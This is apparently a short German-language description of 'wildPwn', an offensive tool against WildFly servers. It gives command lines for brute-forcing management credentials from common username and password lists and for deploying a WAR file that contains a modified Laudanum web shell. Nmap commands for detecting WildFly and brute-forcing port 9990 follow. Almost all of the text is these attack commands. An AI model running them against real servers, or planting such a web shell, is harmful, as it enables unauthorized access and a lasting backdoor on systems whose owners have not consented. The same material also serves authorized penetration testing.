
Brute-Forcer und Shell-Deployer für WildFly
Es ist ein Werkzeug für WildFly. Das Werkzeug kann zum Brute-Forcing oder zur Shell-Bereitstellung verwendet werden. wildPwn.war enthält eine modifizierte Laudanum-Shell. userList.txt enthält häufige Benutzernamen und passList.txt enthält häufige Passwörter.
Bruteforce
python wildPwn.py -m brute --target <TARGET> -user <USERNAME LIST> -pass <PASSWORD LIST>
Shell-Bereitstellung
python wildPwn.py -m deploy --target <TARGET> --port <PORT> -u <USERNAME> -p <PASSWORD>
https://artofpwn.com/wildfly-exploitation.html
Erkennung
nmap --script wildfly-detect <TARGET>
Brute Force
nmap -p 9990 --script wildfly-brute --script-args "userdb=usernameList.txt,passdb=passList.txt,hostname=domain.com" <TARGET>